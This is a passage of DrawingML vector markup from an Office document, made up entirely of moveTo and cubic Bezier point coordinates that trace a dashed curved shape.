                    <a:pt x="266" y="1763"/>
                    <a:pt x="263" y="1763"/>
                    <a:pt x="262" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="1765"/>
                    <a:pt x="260" y="1768"/>
                    <a:pt x="261" y="1770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1775"/>
                    <a:pt x="270" y="1780"/>
                    <a:pt x="275" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="1786"/>
                    <a:pt x="279" y="1786"/>
                    <a:pt x="280" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1784"/>
                    <a:pt x="282" y="1781"/>
                    <a:pt x="281" y="1779"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="1808"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="1804"/>
                    <a:pt x="299" y="1799"/>
                    <a:pt x="294" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1792"/>
                    <a:pt x="290" y="1792"/>
                    <a:pt x="288" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="1795"/>
                    <a:pt x="287" y="1798"/>
                    <a:pt x="288" y="1799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1804"/>
                    <a:pt x="297" y="1809"/>
                    <a:pt x="302" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1816"/>
                    <a:pt x="306" y="1816"/>
                    <a:pt x="308" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="309" y="1813"/>
                    <a:pt x="309" y="1810"/>
                    <a:pt x="308" y="1808"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="336" y="1837"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="1832"/>
                    <a:pt x="327" y="1827"/>
                    <a:pt x="322" y="1823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="1821"/>
                    <a:pt x="318" y="1821"/>
                    <a:pt x="316" y="1823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="1824"/>
                    <a:pt x="315" y="1827"/>
                    <a:pt x="316" y="1828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1833"/>
                    <a:pt x="326" y="1838"/>
                    <a:pt x="331" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="1844"/>
                    <a:pt x="335" y="1844"/>
                    <a:pt x="336" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="1841"/>
                    <a:pt x="338" y="1838"/>
                    <a:pt x="336" y="1837"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="1864"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="1859"/>
                    <a:pt x="356" y="1855"/>
                    <a:pt x="351" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="1849"/>
                    <a:pt x="347" y="1849"/>
                    <a:pt x="345" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="1852"/>
                    <a:pt x="344" y="1855"/>
                    <a:pt x="345" y="1856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="1861"/>
                    <a:pt x="355" y="1865"/>
                    <a:pt x="360" y="1870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="1871"/>
                    <a:pt x="364" y="1871"/>
                    <a:pt x="366" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="1868"/>
                    <a:pt x="367" y="1865"/>
                    <a:pt x="366" y="1864"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="1889"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="1885"/>
                    <a:pt x="386" y="1881"/>
                    <a:pt x="381" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="1875"/>
                    <a:pt x="376" y="1875"/>
                    <a:pt x="375" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="1879"/>
                    <a:pt x="374" y="1881"/>
                    <a:pt x="375" y="1883"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="1887"/>
                    <a:pt x="386" y="1891"/>
                    <a:pt x="391" y="1896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="1897"/>
                    <a:pt x="395" y="1897"/>
                    <a:pt x="396" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="1893"/>
                    <a:pt x="398" y="1891"/>
                    <a:pt x="396" y="1889"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="427" y="1914"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="422" y="1910"/>
                    <a:pt x="417" y="1906"/>
                    <a:pt x="411" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="1901"/>
                    <a:pt x="407" y="1901"/>
                    <a:pt x="406" y="1903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="1904"/>
                    <a:pt x="405" y="1907"/>
                    <a:pt x="407" y="1908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="1912"/>
                    <a:pt x="417" y="1917"/>
                    <a:pt x="422" y="1921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="1922"/>
                    <a:pt x="427" y="1922"/>
                    <a:pt x="428" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="1918"/>
                    <a:pt x="429" y="1916"/>
                    <a:pt x="427" y="1914"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="1938"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="1934"/>
                    <a:pt x="449" y="1930"/>
                    <a:pt x="443" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="1925"/>
                    <a:pt x="439" y="1925"/>
                    <a:pt x="438" y="1927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="436" y="1929"/>
                    <a:pt x="437" y="1931"/>
                    <a:pt x="439" y="1933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="444" y="1937"/>
                    <a:pt x="449" y="1940"/>
                    <a:pt x="455" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="1946"/>
                    <a:pt x="459" y="1945"/>
                    <a:pt x="460" y="1943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462" y="1942"/>
                    <a:pt x="461" y="1939"/>
                    <a:pt x="460" y="1938"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="1960"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="1957"/>
                    <a:pt x="481" y="1953"/>
                    <a:pt x="476" y="1949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474" y="1948"/>
                    <a:pt x="472" y="1948"/>
                    <a:pt x="470" y="1950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="469" y="1952"/>
                    <a:pt x="470" y="1955"/>
                    <a:pt x="471" y="1956"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="1959"/>
                    <a:pt x="483" y="1963"/>
                    <a:pt x="488" y="1967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="490" y="1968"/>
                    <a:pt x="493" y="1968"/>
                    <a:pt x="494" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="1964"/>
                    <a:pt x="494" y="1961"/>
                    <a:pt x="493" y="1960"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="1981"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="1978"/>
                    <a:pt x="515" y="1974"/>
                    <a:pt x="510" y="1971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1970"/>
                    <a:pt x="505" y="1970"/>
                    <a:pt x="504" y="1972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1974"/>
                    <a:pt x="503" y="1976"/>
                    <a:pt x="505" y="1978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="1981"/>
                    <a:pt x="517" y="1985"/>
                    <a:pt x="522" y="1988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="1989"/>
                    <a:pt x="527" y="1989"/>
                    <a:pt x="528" y="1987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="529" y="1985"/>
                    <a:pt x="528" y="1982"/>
                    <a:pt x="527" y="1981"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="561" y="2001"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="1998"/>
                    <a:pt x="550" y="1995"/>
                    <a:pt x="544" y="1991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="542" y="1990"/>
                    <a:pt x="539" y="1991"/>
                    <a:pt x="538" y="1993"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="1995"/>
                    <a:pt x="538" y="1997"/>
                    <a:pt x="540" y="1998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="2002"/>
                    <a:pt x="552" y="2005"/>
                    <a:pt x="557" y="2008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="559" y="2009"/>
                    <a:pt x="562" y="2008"/>
                    <a:pt x="563" y="2006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="2005"/>
                    <a:pt x="563" y="2002"/>
                    <a:pt x="561" y="2001"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="561" y="2001"/>
                    <a:pt x="561" y="2001"/>
                    <a:pt x="561" y="2001"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="597" y="2020"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="2017"/>
                    <a:pt x="585" y="2014"/>
                    <a:pt x="579" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="577" y="2009"/>
                    <a:pt x="575" y="2010"/>
                    <a:pt x="574" y="2012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="2014"/>
                    <a:pt x="573" y="2017"/>
                    <a:pt x="575" y="2018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="581" y="2021"/>
                    <a:pt x="587" y="2024"/>
                    <a:pt x="593" y="2027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="595" y="2028"/>
                    <a:pt x="598" y="2027"/>
                    <a:pt x="599" y="2025"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="2023"/>
                    <a:pt x="599" y="2020"/>
                    <a:pt x="597" y="2020"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="633" y="2037"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="2034"/>
                    <a:pt x="621" y="2031"/>
                    <a:pt x="615" y="2028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="613" y="2027"/>
                    <a:pt x="610" y="2028"/>
                    <a:pt x="609" y="2030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608" y="2032"/>
                    <a:pt x="609" y="2035"/>
                    <a:pt x="611" y="2035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="617" y="2038"/>
                    <a:pt x="623" y="2041"/>
                    <a:pt x="630" y="2044"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="632" y="2045"/>
                    <a:pt x="634" y="2044"/>
                    <a:pt x="635" y="2042"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="2040"/>
                    <a:pt x="635" y="2038"/>
                    <a:pt x="633" y="2037"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="670" y="2052"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="2050"/>
                    <a:pt x="657" y="2047"/>
                    <a:pt x="651" y="2045"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="649" y="2044"/>
                    <a:pt x="647" y="2045"/>
                    <a:pt x="646" y="2047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="645" y="2049"/>
                    <a:pt x="646" y="2051"/>
                    <a:pt x="648" y="2052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="654" y="2055"/>
                    <a:pt x="660" y="2057"/>
                    <a:pt x="667" y="2060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="2061"/>
                    <a:pt x="671" y="2060"/>
                    <a:pt x="672" y="2058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="673" y="2056"/>
                    <a:pt x="672" y="2053"/>
                    <a:pt x="670" y="2052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="2052"/>
                    <a:pt x="670" y="2052"/>
                    <a:pt x="670" y="2052"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="707" y="2067"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="2064"/>
                    <a:pt x="695" y="2062"/>
                    <a:pt x="688" y="2060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="2059"/>
                    <a:pt x="684" y="2060"/>
                    <a:pt x="683" y="2062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="682" y="2064"/>
                    <a:pt x="683" y="2066"/>
                    <a:pt x="685" y="2067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="692" y="2070"/>
                    <a:pt x="698" y="2072"/>
                    <a:pt x="704" y="2074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="2075"/>
                    <a:pt x="709" y="2074"/>
                    <a:pt x="709" y="2072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="710" y="2070"/>
                    <a:pt x="709" y="2068"/>
                    <a:pt x="707" y="2067"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="745" y="2080"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="2078"/>
                    <a:pt x="732" y="2076"/>
                    <a:pt x="726" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="2073"/>
                    <a:pt x="722" y="2074"/>
                    <a:pt x="721" y="2076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="720" y="2078"/>
                    <a:pt x="721" y="2080"/>
                    <a:pt x="723" y="2081"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="730" y="2083"/>
                    <a:pt x="736" y="2085"/>
                    <a:pt x="743" y="2087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="745" y="2088"/>
                    <a:pt x="747" y="2087"/>
                    <a:pt x="748" y="2085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="748" y="2083"/>
                    <a:pt x="747" y="2080"/>
                    <a:pt x="745" y="2080"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="783" y="2091"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="2089"/>
                    <a:pt x="770" y="2088"/>
                    <a:pt x="764" y="2086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="762" y="2085"/>
                    <a:pt x="760" y="2086"/>
                    <a:pt x="759" y="2088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758" y="2090"/>
                    <a:pt x="760" y="2093"/>
                    <a:pt x="762" y="2093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="768" y="2095"/>
                    <a:pt x="775" y="2097"/>
                    <a:pt x="781" y="2099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="783" y="2099"/>
                    <a:pt x="785" y="2098"/>
                    <a:pt x="786" y="2096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="787" y="2094"/>
                    <a:pt x="785" y="2092"/>
                    <a:pt x="783" y="2091"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="822" y="2101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="815" y="2100"/>
                    <a:pt x="809" y="2098"/>
                    <a:pt x="802" y="2096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="800" y="2096"/>
                    <a:pt x="798" y="2097"/>
                    <a:pt x="798" y="2099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="2101"/>
                    <a:pt x="798" y="2104"/>
                    <a:pt x="800" y="2104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="807" y="2106"/>
                    <a:pt x="813" y="2107"/>
                    <a:pt x="820" y="2109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="822" y="2109"/>
                    <a:pt x="824" y="2108"/>
                    <a:pt x="825" y="2106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="825" y="2104"/>
                    <a:pt x="824" y="2102"/>
                    <a:pt x="822" y="2101"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="861" y="2110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="2108"/>
                    <a:pt x="848" y="2107"/>
                    <a:pt x="841" y="2106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="2105"/>
                    <a:pt x="837" y="2106"/>
                    <a:pt x="837" y="2109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="836" y="2111"/>
                    <a:pt x="837" y="2113"/>
                    <a:pt x="840" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="846" y="2115"/>
                    <a:pt x="853" y="2116"/>
                    <a:pt x="859" y="2117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="861" y="2118"/>
                    <a:pt x="864" y="2117"/>
                    <a:pt x="864" y="2114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="864" y="2112"/>
                    <a:pt x="863" y="2110"/>
                    <a:pt x="861" y="2110"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="900" y="2117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="2116"/>
                    <a:pt x="887" y="2115"/>
                    <a:pt x="880" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="878" y="2113"/>
                    <a:pt x="876" y="2114"/>
                    <a:pt x="876" y="2117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="875" y="2119"/>
                    <a:pt x="877" y="2121"/>
                    <a:pt x="879" y="2121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="886" y="2122"/>
                    <a:pt x="892" y="2124"/>
                    <a:pt x="899" y="2125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="901" y="2125"/>
                    <a:pt x="903" y="2123"/>
                    <a:pt x="903" y="2121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="904" y="2119"/>
                    <a:pt x="902" y="2117"/>
                    <a:pt x="900" y="2117"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="940" y="2122"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="933" y="2121"/>
                    <a:pt x="926" y="2121"/>
                    <a:pt x="920" y="2120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="918" y="2119"/>
                    <a:pt x="916" y="2121"/>
                    <a:pt x="915" y="2123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="915" y="2125"/>
                    <a:pt x="917" y="2127"/>
                    <a:pt x="919" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="925" y="2128"/>
                    <a:pt x="932" y="2129"/>
                    <a:pt x="939" y="2130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="941" y="2130"/>
                    <a:pt x="943" y="2129"/>
                    <a:pt x="943" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="943" y="2124"/>
                    <a:pt x="942" y="2122"/>
                    <a:pt x="940" y="2122"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="979" y="2126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="973" y="2126"/>
                    <a:pt x="966" y="2125"/>
                    <a:pt x="959" y="2124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="957" y="2124"/>
                    <a:pt x="955" y="2126"/>
                    <a:pt x="955" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="955" y="2130"/>
                    <a:pt x="956" y="2132"/>
                    <a:pt x="959" y="2132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="965" y="2133"/>
                    <a:pt x="972" y="2134"/>
                    <a:pt x="979" y="2134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="981" y="2134"/>
                    <a:pt x="983" y="2133"/>
                    <a:pt x="983" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="983" y="2128"/>
                    <a:pt x="982" y="2126"/>
                    <a:pt x="979" y="2126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="979" y="2126"/>
                    <a:pt x="979" y="2126"/>
                    <a:pt x="979" y="2126"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1019" y="2129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1012" y="2129"/>
                    <a:pt x="1006" y="2128"/>
                    <a:pt x="999" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="997" y="2128"/>
                    <a:pt x="995" y="2129"/>
                    <a:pt x="995" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="995" y="2134"/>
                    <a:pt x="996" y="2136"/>
                    <a:pt x="999" y="2136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1005" y="2136"/>
                    <a:pt x="1012" y="2137"/>
                    <a:pt x="1019" y="2137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1021" y="2137"/>
                    <a:pt x="1023" y="2135"/>
                    <a:pt x="1023" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1023" y="2131"/>
                    <a:pt x="1021" y="2129"/>
                    <a:pt x="1019" y="2129"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1059" y="2130"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1052" y="2130"/>
                    <a:pt x="1046" y="2130"/>
                    <a:pt x="1039" y="2130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1037" y="2130"/>
                    <a:pt x="1035" y="2131"/>
                    <a:pt x="1035" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1035" y="2136"/>
                    <a:pt x="1037" y="2138"/>
                    <a:pt x="1039" y="2138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1046" y="2138"/>
                    <a:pt x="1052" y="2138"/>
                    <a:pt x="1059" y="2138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1061" y="2138"/>
                    <a:pt x="1063" y="2136"/>
                    <a:pt x="1063" y="2134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1063" y="2132"/>
                    <a:pt x="1061" y="2130"/>
                    <a:pt x="1059" y="2130"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1099" y="2130"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1092" y="2130"/>
                    <a:pt x="1086" y="2130"/>
                    <a:pt x="1079" y="2130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1077" y="2130"/>
                    <a:pt x="1075" y="2132"/>
                    <a:pt x="1075" y="2134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="2136"/>
                    <a:pt x="1077" y="2138"/>
                    <a:pt x="1079" y="2138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1086" y="2138"/>
                    <a:pt x="1092" y="2138"/>
                    <a:pt x="1099" y="2138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1101" y="2137"/>
                    <a:pt x="1103" y="2136"/>
                    <a:pt x="1103" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="2131"/>
                    <a:pt x="1101" y="2129"/>
                    <a:pt x="1099" y="2130"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1139" y="2128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1132" y="2128"/>
                    <a:pt x="1126" y="2129"/>
                    <a:pt x="1119" y="2129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1117" y="2129"/>
                    <a:pt x="1115" y="2131"/>
                    <a:pt x="1115" y="2133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1115" y="2135"/>
                    <a:pt x="1117" y="2137"/>
                    <a:pt x="1119" y="2137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1126" y="2136"/>
                    <a:pt x="1133" y="2136"/>
                    <a:pt x="1139" y="2136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1141" y="2136"/>
                    <a:pt x="1143" y="2134"/>
                    <a:pt x="1143" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1143" y="2129"/>
                    <a:pt x="1141" y="2128"/>
                    <a:pt x="1139" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1139" y="2128"/>
                    <a:pt x="1139" y="2128"/>
                    <a:pt x="1139" y="2128"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1179" y="2124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1172" y="2125"/>
                    <a:pt x="1165" y="2126"/>
                    <a:pt x="1159" y="2126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1156" y="2126"/>
                    <a:pt x="1155" y="2128"/>
                    <a:pt x="1155" y="2131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="2133"/>
                    <a:pt x="1157" y="2134"/>
                    <a:pt x="1159" y="2134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1166" y="2134"/>
                    <a:pt x="1173" y="2133"/>
                    <a:pt x="1179" y="2132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1182" y="2132"/>
                    <a:pt x="1183" y="2130"/>
                    <a:pt x="1183" y="2128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1183" y="2126"/>
                    <a:pt x="1181" y="2124"/>
                    <a:pt x="1179" y="2124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="2124"/>
                    <a:pt x="1179" y="2124"/>
                    <a:pt x="1179" y="2124"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1218" y="2120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1212" y="2120"/>
                    <a:pt x="1205" y="2121"/>
                    <a:pt x="1198" y="2122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1196" y="2122"/>
                    <a:pt x="1195" y="2124"/>
                    <a:pt x="1195" y="2127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1195" y="2129"/>
                    <a:pt x="1197" y="2130"/>
                    <a:pt x="1199" y="2130"/>
